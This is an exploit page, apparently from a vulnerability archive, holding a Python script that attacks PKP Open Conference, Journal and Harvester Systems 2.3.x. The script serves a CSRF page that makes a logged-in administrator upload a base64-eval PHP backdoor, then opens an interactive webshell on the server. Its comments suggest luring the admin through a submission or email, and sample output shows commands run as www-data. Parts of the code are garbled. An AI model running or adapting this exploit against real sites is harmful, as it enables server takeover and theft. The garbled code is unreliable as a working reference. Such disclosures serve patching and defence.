Open Conference / Journal / Harvester Systems 2.3.x Code Execution

2011-12-24 / 2012-10-04
Risk: High
Local: No
Remote: Yes
CWE: CWE-352

#!/usr/bin/python # # Open Conference/Journal/Harvester Systems <= 2.3.X multiple remote code execution vulnerabilities # vendor_________: Public Knowledge Project (pkp) - # software link__: # author_________: mr_me::rwx kru # email__________: steventhomasseeley!gmail!com # tested on______: the interwebz & a LAMP stack using all 3 applications :) # # Vulnerable applications by pkp: # - Open Conference Systems <= v2.3.4 # - Open Journal Systems <= v2.3.6 # - Open Harvester Systems <= v2.3.1 # # Greetz to @kkotowicz, @malerisch and other busticati # # References: # ----------- # # # # Description: # ------------ # PKP has developed free, open source software for the management, publishing, and indexing of journals and conferences. # Open Journal Systems and Open #Conference Systems increase access to knowledge, improve management, and reduce publishing costs. # Open Harvester systems allows the creation of #centralized search services on metadata from Open Archives Initiative-compliant databases. # # Vuln description: # ----------------- # There is a few file upload vulnerabilities in the administrative interfaces of these applications that are # unprotected and allow any peepz to CSRF it. I'm sick of vendors ignoring me on this kind of bug. # # Exploit requirement: # -------------------- # - Find the target conference/journal/archive: just visit http://[target]/[path]/index.php # It will be a string value in a URI embeded in the page. Just use the first conference/journal/archive, and it will be id 1. # - You will need to embed the link into the application too and hope the admin gets curious.. # Maybe you could make a 'submission' to the conference, journal or archive entry or send a kind email ;) # ============================================================================================ # mr_me@gliese:~/$ python -p localhost:8081 -t -d ocs-2.3.4 -P 9090 -s seriousbiz # # +==============================================================================================+ # | Open Conference/Journal/Harvester Systems <= 2.3.X csrf/upload/remote code execution exploit | # | Found by: mr_me | # +==============================================================================================+ # (+) Testing proxy @ localhost:8081.. proxy is found to be working! # (+) Listening on local port 9090. # (+) Have someone connect to you at # # Type <ctrl>-c to exit.. # # localhost - - [23/Dec/2011 18:15:21] "GET / HTTP/1.1" 200 - # # (+) Exploit sent to the client target attacking # (-) Code injection and execution failed! # (-) Target client may not logged into the admin interface of Open Systems..! # # localhost - - [23/Dec/2011 18:15:39] "GET / HTTP/1.1" 200 - # # (+) Exploit sent to the client target attacking # (!) Code injection worked! # (!) Launching webshell..! # # opensys_shell@ id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # # opensys_shell@ uname -a # Linux steve-web-server 2.6.35-31-generic #62-Ubuntu SMP Tue Nov 8 14:00:30 UTC 2011 i686 GNU/Linux # # opensys_shell@ q # # (+) Back to listening.. # # ^C(-) Exiting Exploit. # # .. have a merry christmas & happy new year ! import sys import urllib import urllib2 from optparse import OptionParser from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler from socket import gethostbyname, gethostname from time import sleep from base64 import b64encode usage = "./%prog [<options>] -t [target] -d [directory]" usage += "\nExample: ./%prog -p localhost:8080 -t -d ocs-2.3.4 -P 80 -s seriousbiz" parser = OptionParser(usage=usage) parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP proxy <server:port>") parser.add_option("-t", type="string", action="store", dest="target", help="The target server <server:port>") parser.add_option("-d", type="string", action="store", dest="target_path", help="Directory path to the Open Conference/Journal/Harvester Systems") parser.add_option("-s", type="string", action="store", dest="conf_jour_arch", help="The target conference/journal/archive") parser.add_option("-P", type="int", action="store", dest="localport", help="The local port to have the target client connect back on") (options, args) = parser.parse_args() # some variables phpkode = "<?php error_reporting(0); eval(base64_decode($_SERVER[HTTP_HAX])); ?>" # change the code if you want app_entry_id = "1" # change to the right conference/journal/archive id (default = 1) app_type = "journals" # (conferences, journals or archives) def banner(): print ("\n\t| -------------------------------------------------------------------------------------------- |") print ("\t| Open Conference/Journal/Harvester Systems <= 2.3.4 csrf/upload remote code execution exploit |") print ("\t| found by mr_me ----------------------------------------------------------------------------- |\n") def test_proxy(): check = 1 sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy)) sys.stdout.flush() try: req = urllib2.Request("") req.set_proxy(options.proxy,"http") check = urllib2.urlopen(req) except: check = 0 pass if check != 0: sys.stdout.write("proxy is found to be working!\n") sys.stdout.flush() else: print ("proxy failed, exiting..") sys.exit(1) def submit_request(exploit, header=None, data=None): try: if header != None: headers = {} headers['Hax'] = header if data != None: data = urllib.urlencode(data) req = urllib2.Request("http://"+exploit, data, headers) if options.proxy: req.set_proxy(options.proxy,"http") check = urllib2.urlopen(req).read() except urllib.error.HTTPError, error: check = except urllib.error.URLError: print ("(-) Target connection failed, check your address") sys.exit(1) return check def check_request(req): req = urllib2.Request("http://"+req) if options.proxy: req.set_proxy(options.proxy,"http") return urllib2.urlopen(req).code def check_shell(): full_request = + "/" + options.target_path + "/files/" + app_type +"/" + app_entry_id + "/zeitgeist.php" try: check_request(full_request) print ("(!) Code injection worked!") return True except: print ("(-) Code injection and execution failed!") print ("(-) Target client may not logged into the admin interface of Open Systems..!\n") return False return True def drop_to_shell(): print ("(!) Launching webshell..!") hn = "\nopensys_shell@%s# " % ( raw_cmd = "" while raw_cmd != 'q': raw_cmd = raw_input(hn) base64_cmd = b64encode("system(\"%s\");" % raw_cmd) try: full_request = + "/" + options.target_path + "/files/" + app_type + "/" + app_entry_id + "/zeitgeist.php" cmd_response = submit_request(full_request, base64_cmd, "") except: print ("(-) Code injection and execution failed!") print ("(-) Target client may not logged into the admin interface of Open Systems..!\n") break print cmd_response.rstrip() print ("(+) Back to listening..\n") class myRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.printCustomHTTPResponse(200) if self.path == "/": target=self.client_address[0] self.response = """<html> <body> <script> var target = 'http://[targethost]/[path]/index.php/[app]/index/manager/fileUpload/'; function fileUpload(fileData, fileName) { var fileSize = fileData.length, boundary = "---------------------------270883142628617", uri = target, xhr = new XMLHttpRequest(), fileFieldName = "file";"POST", uri, true); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); xhr.setRequestHeader("Content-Length", fileSize); xhr.withCredentials = "true"; var body = ""; body += addFileField(fileFieldName, fileData, fileName, boundary); body += "--" + boundary + "--"; xhr.send(body); return true; } function addFileField(name, value, filename, boundary) { var c = "--" + boundary + "\\r\\n" c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\\r\\n'; c += "Content-Type: application/x-httpd-php\\r\\n\\r\\n"; c += value + "\\r\\n"; return c; } function start() { fileUpload("[phpkode]", "zeitgeist.php"); } start(); </script> </body> </html>""" self.response = self.response.replace("[targethost]", self.response = self.response.replace("[path]",options.target_path) # slight variations.. if app_type == "journals": self.response = self.response.replace("[app]/index",options.conf_jour_arch) else: self.response = self.response.replace("[app]",options.conf_jour_arch) self.response = self.response.replace("[phpkode]",phpkode) self.wfile.write(self.response) print ("\n(+) Exploit sent to the client target %s attacking %s." % (target, sleep(2) # let the target get exploited, sheesh. if check_shell(): drop_to_shell() def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() def main(): # checks if len(sys.argv) <= 8: banner() parser.print_help() sys.exit(1) elif not options.target_path or not options.conf_jour_arch or not banner() parser.print_help() sys.exit(1) if not options.localport: port = 8080 else: port = int(options.localport) httpd = HTTPServer(('', port), myRequestHandler) print ( """\n\t\t+==============================================================================================+ \t| Open Conference/Journal/Harvester Systems <= 2.3.X csrf/upload/remote code execution exploit | \t| Found by: mr_me | \t+==============================================================================================+""") if options.proxy: test_proxy() print ("(+) Listening on local port %d." % port) print ("(+) Have someone connect to you at http://%s:%s/" % (gethostbyname(gethostname()),port)) print ("\nType <ctrl>-c to exit..\n") try: httpd.handle_request() httpd.serve_forever() except KeyboardInterrupt: print ("(-) Exiting Exploit.") sys.exit(1) if __name__ == "__main__": main()


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